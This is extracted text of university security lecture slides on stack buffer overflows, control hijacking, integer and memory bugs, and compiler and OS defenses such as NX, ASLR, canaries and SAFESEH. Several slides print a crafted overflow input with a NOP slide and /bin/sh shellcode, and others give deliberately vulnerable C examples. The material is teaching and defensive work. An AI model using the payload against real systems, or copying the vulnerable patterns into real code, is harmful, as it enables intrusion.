23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

61. Basic Stack Exploit OVERWRITE POINT!
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x08048564 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

62. Basic Stack Exploit OVERWRITE POINT!
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x0804f764 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

63. Basic Stack Exploit OVERWRITE POINT!
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x08fff764 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

64. Basic Stack Exploit OVERWRITE POINT!
parse.c
0xbffff764
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

65. Basic Stack Exploit ACTIVATE POINT!
parse.c shellcode
0xbffff764
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
file (input file)
0xbffff6b0 0xbffff6c4 in
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i
(Unallocated)

66. The NOP Slide
Shellcode
----------------------------------------
NOP
NOP
To previous stack .
.
frame pointer .
NOP
arguments
return address crafted return address
stack frame pointer
To the instruction
at which this
buffer function was called buffer
Problem: how does attacker Solution: NOP slide
determine ret-address? • Guess approximate stack state when the function
is called
• Insert many NOPs before Shell Code ‘/x90’

67. The NOP Slide
parse.c
1:void copy_lower (char* in, char* out) { shellcode
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) { 0x90909090
4: out[i] = tolower(in[i]); 0x90909090
5: i++; .
.
6: } .
7: buf[i] = ‘0’; 0xbffff764 0x90909090
8:}
9:int parse(FILE *fp) { 0xbffff760 0x90909090 fp
10: char buf[5], *url, cmd[128]; return address
11: fread(cmd, 1, 256, fp); 0xbffff75c 0xfffff764
12: int header_ok = 0; stack frame ptr
. 0xbffff758 0x61616161
.
. 0xbffff74c url
19: url = cmd + 4; 0x61616161
0xbffff748 0x61616161 header_ok
20: copy_lower(url, buf);
21: printf(‚Location is %sn‛, buf); 0xbffff744 0x61616161 ?,?,?,buf[4]
22: return 0; } 0xbffff740 0x61616161 buf[3,2,1,0]
0xbffff73c 0x00000000 cmd[128,127,126,125]
23: /** main to load a file and run parse */ . . .
. . .
. . .
0xbffff6c4 0x41414141 cmd[7,6,5,4]
file (input file) 0xbffff6c0 0x20544547 cmd[3,2,1,0]
0xbffff74c 0xbffff6c4 url
GET 0xbffff748 0x00000001 header_ok
AAAAAAAAAAAAAAAAAAAAx64xf7xffxff/x90/x90/x90/x9
0/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x
90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/
x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90xebx1fx
5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4 (copy_lower)
ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdc
xffxffxff/bin/sh
(Unallocated)

68. More on Stack Smashing
• Some complications on Shellcode:
– Shellcode should not contain the ‘0’ character.
– Overflow should not crash program before the
frame’s function exits
• Sample remote stack smashing overflows:
– (2007) Overflow in Windows animated cursors
(ANI). LoadAniIcon()
– (2005) Overflow in Symantic Virus Detection
test.GetPrivateProfileString “file”, [long string]
Dawn Song 68

69. Many unsafe libc functions
strcpy (char *dest, const char *src)
strcat (char *de st, const char *src)
gets (char *s)
scanf ( const char *format, … ) and many more.
• “Safe” libc versions strncpy(), strncat() are misleading
– e.g. strncpy() may leave string unterminated.
• Windows C run time (CRT):
– strcpy_s (*dest, DestSize, *src): ensures proper termination

70. General Control Hijacking: Return Address
ShellCode
To previous stack
frame pointer
arguments arguments
return address crafted return address
return address
stack frame pointer stack frame pointer
To the instruction at which
this function was called
buffer buffer
Overwrite Step: Overwrite return address to point to your code.
Activate Step: Return out of frame andDawn Song
into your code. 70

71. General Control Hijacking: Local Fn Ptr
ShellCode
arguments arguments
return address return address
stack frame pointer stack frame pointer
To instructions for a
function
local function pointer crafted local function pointer
local function pointer
buffer buffer
Overwrite Step: Overwrite local function pointer to point to your code.
Activate Step: Call that local function variable. Song
Dawn 71

72. General Control Hijacking:
Function Pointer in the Heap
Object T vtable Object T vtable
ptr FP1: method #1 ptr FP1:
crafted FP1: shellcode
method #1
FP2: method #2 FP2:
crafted FP2: method #2
shellcode
data FP3: method #3 data FP3:
crafted FP3: method #3
shellcode
buffer buffer
Overwrite Step: Overwrite entries in a vtable for Object T.
Activate Step: Call any method from Object T Song
Dawn 72

73. General Control Hijacking:
Function Pointer in the Heap
(crafted vtable) crafted FP1: shellcode
crafted FP2: shellcode
Object T vtable crafted FP3: shellcode
vtable
ptr FP1: method #1 crafted ptr
ptr FP1: method #1
FP2: method #2 FP2: method #2
data FP3: method #3 data FP3: method #3
buffer buffer
Overwrite Step: Overwrite pointer to vtable on heap to point to a crafted vtable.
Activate Step: Call any method from Object T Song
Dawn 73

74. Attack: return-to-libc (arc injection)
• Control hijacking without executing code
(stack)
(libc.so)
arguments
return address exec()
stack frame pointer printf()
buffer “/bin/shell”
Dawn Song 74

75. General Control Hijacking
Control Flow Pointer expected code
return address
frame pointer function pointer as
exception Handler local variable
shellcode, library
jump to address longjmp pointer
(return to libc)
function pointer in heap
Overwrite Step:
Find some way to modify a Control Flow Pointer to point to your shellcode, library
entry point, or other code of interest.
Activate Step:
Find some way to activate that modified Control Flow Pointer.
Dawn Song 75

76. Instances of Control Hijacking
Location in Control Flow How to activate
Memory
Pointer
Stack Return Address Return from
function
(stack frame)
Stack Frame Pointer Return from Ret Addr
function Frame Ptr
exception handers
Stack Function Pointers Reference and call local fn ptrs
as local variables function pointer
buf
Stack Exception Handler Trigger Exception
Heap Function pointer in Reference and call
Object T vtable Object T vtable
heap (i.e. method function pointer
ptr FP1: method #1 ptr FP1: method #1
of an object) FP2: method #2 FP2: method #2
data FP3: method #3 data FP3: method #3
buf buf
Anywhere setjmp and longjmp Call longjmp
program state longjmp saved pointer
buffer …
other data
buf
Dawn Song 76

77. Data Hijacking
Modifying data in a way not intended Example: Authentication variable
arguments arguments
arguments
return address return address
return address
stack frame pointer stack frame pointer
stack frame pointer
authentication_variable authentication_variable
authentication_variable
buffer buffer
buffer
Normal Situation:
Exploited Situation:
User types in a password which is stored in the to overflow if the user is successfully
long enough buffer, and buffer and into the
authenticated, the authentication_variableSong
authentication_variable. The user Dawn is set.
is now unintentionally authenticated. 77

78. Computer Security Course. Dawn Song
Software Security (II):
Other types of software vulnerabilities
Dawn Song 78

79. Common Coding Errors
• Input validation vulnerabilities
• Memory management vulnerabilities
• TOCTTOU vulnerabilities
Dawn Song 79

80. Input validation vulnerabilities
• Program requires certain assumptions on
inputs to run properly
• Without correct checking for inputs
– Program gets exploited
• Example:
– Buffer overflow
– Format string
Dawn Song 80

81. Example I
unsigned int size;
Data **datalist;
size = GetUntrustedSizeValue();
datalist = (data **)malloc(size * sizeof(Data *));
for(int i=0; i<size; i++) {
datalist[i] = InitData();
}
datalist[size] = NULL;
...
Dawn Song 81

82. Example II
• char buf[80];
void vulnerable() {
int len = read_int_from_network();
char *p = read_string_from_network();
if (len > sizeof buf) {
error("length too large, nice try!");
return;
}
memcpy(buf, p, len);
}
• What's wrong with this code?
• Hint – memcpy() prototype:
– void *memcpy(void *dest, const void *src, size_t n);
• Definition of size_t: typedef unsigned int size_t;
• Do you see it now?
Dawn Song 82

83. Implicit Casting Bug
• Attacker provides a negative value for len
– if won’t notice anything wrong
– Execute memcpy() with negative third arg
– Third arg is implicitly cast to an unsigned int, and
becomes a very large positive int
– memcpy() copies huge amount of memory into buf,
yielding a buffer overrun!
• A signed/unsigned or an implicit casting bug
– Very nasty – hard to spot
• C compiler doesn’t warn about type mismatch
between signed int and unsigned int
– Silently inserts an implicit cast
Dawn Song 83

84. Example III (Integer Overflow)
• size_t len = read_int_from_network();
char *buf;
buf = malloc(len+5);
read(fd, buf, len);
...
• What’s wrong with this code?
– No buffer overrun problems (5 spare bytes)
– No sign problems (all ints are unsigned)
• But, len+5 can overflow if len is too large
– If len = 0xFFFFFFFF, then len+5 is 4
– Allocate 4-byte buffer then read a lot more than 4
bytes into it: classic buffer overrun!
• Know programming language’s semantics well to
avoid pitfalls Dawn Song 84

85. Example IV
char* ptr = (char*)malloc (SIZE);
if (err) {
abrt = 1;
free(ptr);
}
...
if (abrt) {
logError("operation aborted before commit", ptr);
}
• Use-after-free
• Corrupt memory
http://cwe.mitre.org Dawn Song 85

86. Example IV
char* ptr = (char*)malloc (SIZE);
...
if (abrt) {
free(ptr);
}
...
free(ptr);
• Double-free error
• Corrupts memory-management data structure
http://owasp.org Dawn Song 86

87. What are software vulnerabilities?
• Flaws in software
• Break certain assumptions important for security
– What assumptions broken in buffer overflow?
Dawn Song 87

88. Why does software have vulnerabilities?
• Programmers are humans!
– Humans make mistakes!
• Programmers were not security aware
• Programming languages are not designed well for
security
Dawn Song 88

89. What can you do?
• Programmers are humans!
– Humans make mistakes!
– Use tools! (next lecture)
• Programmers were not security aware
– Learn about different common classes of coding errors
• Programming languages are not designed well for
security
– Pick better languages
Dawn Song 89

90. Computer Security Course. Dawn Song
Software Security (III):
Buffer-overflow Defenses
Dawn Song 90

91. Preventing hijacking attacks
Fix bugs:
• Audit software
• Automated tools: Coverity, Prefast/Prefix, Fortify
• Rewrite software in a type-safe language (Java, ML)
• Difficult for existing (legacy) code …
Allow overflow, but prevent code execution
Add runtime code to detect overflows exploits:
• Halt process when overflow exploit detected
• StackGuard, Libsafe
Dawn Song 91

92. Control-hijacking Attack Space
Code Injection Arc Injection
Stack
Heap
Exception
Handlers
Dawn Song 92

93. Defense I: non-execute (W^X)
Prevent attack code execution by marking stack and
heap as non-executable
• NX-bit on AMD Athlon 64, XD-bit on Intel P4
Prescott
– NX bit in every Page Table Entry (PTE)
• Deployment:
– Linux (via PaX project); OpenBSD
– Windows: since XP SP2 (DEP)
• Boot.ini : /noexecute=OptIn or AlwaysOn
• Visual Studio: /NXCompat[:NO]
Dawn Song 93

94. Effectiveness and Limitations
• Limitations:
– Some apps need executable heap (e.g. JITs).
– Does not defend against `return-to-libc’ exploits
Code Injection Arc Injection
Stack Non-Execute (NX)*
Heap Non-Execute (NX)*
Exception Non-Execute (NX)*
Handlers
* When Applicable Dawn Song 94

95. Defense II: Address Randomization
ASLR: (Address Space Layout Randomization)
-0xFFFFFFFF
– Start stack at a random location
Reserved for Kernal
– Start heap at a random locatioin -0xC0000000
– Map shared libraries to rand location in process unused
user stack -0xBFF9AB20
memory user stack
Attacker cannot jump directly to exec
function
– Deployment: (/DynamicBase)
shared libraries
• Windows Vista: 8 bits of randomness for DLLs shared libraries -0x40000000
– aligned to 64K page in a 16MB region
256 choices
run time heap
• Linux (via PaX): 16 bits of randomness for run time heap
libraries
static data segment
– More effective on 64-bit architectures
text segment (program)
-0x08048000
Other randomization methods: unused
– Sys-call randomization: randomize sys-call id’s -0x00000000
Dawn Song
– Instruction Set Randomization (ISR) 95

96. Effectiveness and Limitations
• Limitations
– Randomness is limited
– Some vulnerabilities can allow secret to be leaked
Code Injection Arc Injection
Stack Non-Execute (NX)* ASLR
ASLR
Heap Non-Execute (NX)* ASLR
ASLR
Exception Non-Execute (NX)* ASLR
ASLR
Handlers
* When Applicable Dawn Song 96

97. Defense III: StackGuard
• Run time tests for stack integrity
arguments
• Embed “canaries” in stack frames return address
stack frame pointer
and verify their integrity prior to CANARY
function return local variables
Dawn Song 97

98. Canary Types
• Random canary:
– Random string chosen at program startup.
– Insert canary string into every stack frame.
– Verify canary before returning from function.
• Exit program if canary changed. Turns potential exploit into DoS.
– To exploit successfully, attacker must learn current random string.
• Terminator canary: Canary = {0, newline, linefeed, EOF}
– String functions will not copy beyond terminator.
– Attacker cannot use string functions to corrupt stack.
Dawn Song 98

99. StackGuard (Cont.)
• StackGuard implemented as a GCC patch.
– Program must be recompiled.
• Low performance effects: 8% for Apache.
• Note: Canaries don’t provide full proof protection.
– Some stack smashing attacks leave canaries unchanged
• Heap protection: PointGuard.
– Protects function pointers and setjmp buffers by
encrypting them: e.g. XOR with random cookie
– Less effective, more noticeable performance effects
Dawn Song 99

100. StackGuard enhancements: ProPolice
• ProPolice (IBM) - gcc 3.4.1. (-fstack-protector)
– Rearrange stack layout to prevent ptr overflow.
String
Growth arguments
Protects pointer args and local
return address pointers from a buffer overflow
stack frame pointer
CANARY
local string buffers
local string variables
Stack
Growth
local non-buffer
variables
pointers, but no arrays
copy of pointer args
Dawn Song 100

101. MS Visual Studio /GS [since 2003]
Compiler /GS option:
– Combination of ProPolice and Random canary.
– If cookie mismatch, default behavior is to call _exit(3)
Function prolog: Function epilog:
sub esp, 8 // allocate 8 bytes for cookie mov ecx, DWORD PTR [esp+8]
mov eax, DWORD PTR ___security_cookie xor ecx, esp
xor eax, esp // xor cookie with current esp call @__security_check_cookie@4
mov DWORD PTR [esp+8], eax // save in stack add esp, 8
Enhanced /GS in Visual Studio 2010:
– /GS protection added to all functions, unless can be proven unnecessary
Dawn Song 101

102. /GS stack frame
String
arguments
Growth
return address
stack frame pointer
Canary protects ret-addr and
exception handlers
exception handler frame
CANARY
local string buffers
local string variables
Stack local non-buffer
pointers, but no arrays
variables
Growth
Dawn Song 102

103. Effectiveness and Limitations
• Limitation:
– Evasion with exception handler * When Applicable
Code Injection Arc Injection
Stack Non-Execute (NX)* ASLR
ASLR StacKGuard(Canaries)
StacKGuard(Canaries) ProPolice
ProPolice /GS
/GS
Heap Non-Execute (NX)* ASLR
ASLR PointGuard
PointGuard
Exception Non-Execute (NX)* ASLR
ASLR
Handlers
Dawn Song 103

104. Evading /GS with exception handlers
• When exception is thrown, dispatcher walks handler
up exception list until handler is found
next
(else use default handler)
After overflow: handler points to attacker’s code
handler
exception triggered ⇒ control hijack
next
crafted
ptr
Main point: exception is triggered buffer
buffer
before canary is checked
handler
handler
SEH frame
next
next

105. Defense III: SAFESEH and SEHOP
• /SAFESEH: linker flag
– Linker produces a binary with a table of safe exception handlers
– System will not jump to exception handler not on list
• /SEHOP: platform defense (since win vista SP1)
– Observation: SEH attacks typically corrupt the “next” entry in SEH list.
– SEHOP: add a dummy record at top of SEH list
– When exception occurs, dispatcher walks up list and verifies dummy
record is there. If not, terminates process.
Dawn Song 105